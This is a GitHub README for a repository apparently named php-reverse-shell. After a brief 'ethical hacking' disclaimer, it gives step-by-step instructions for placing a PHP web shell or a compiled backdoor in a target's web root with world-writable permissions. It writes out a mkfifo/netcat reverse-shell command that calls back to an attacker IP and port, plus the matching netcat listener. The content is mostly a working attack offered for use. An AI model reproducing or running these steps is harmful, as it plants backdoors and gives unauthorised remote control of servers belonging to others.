Skip to content

anggrdwjy/php-reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Information

I am not responsible for any consequences caused by this script because this script was created for Ethical Hacking purposes.

Methode 1 (PHPShell)

Download PHPShell (Target Folder, Example : /var/www/html)

https://github.com/flozz/p0wny-shell.git
chmod -R 777 *

Access Web Server with Browser

http://targetwebsite.com/shell.php 

Methode 2 (Reverse Shell)

Download Payload (Target Folder, Example : /var/www/html)

git clone https://github.com/anggrdwjy/php-reverse-shell.git
cd php-reverse-shell
chmod -R 777 *

Edit File : payload_nc.c

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.1 4444 >/tmp/f");  //Edit Line 5

Running File : gcc.sh

./gcc.sh

Access Web Server with Browser

http://targetwebsite.com/backdoor.php 

Attacker Side

nc -tnlp 4444 

Support

References

About

Reverse Shell Testing for PHP

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published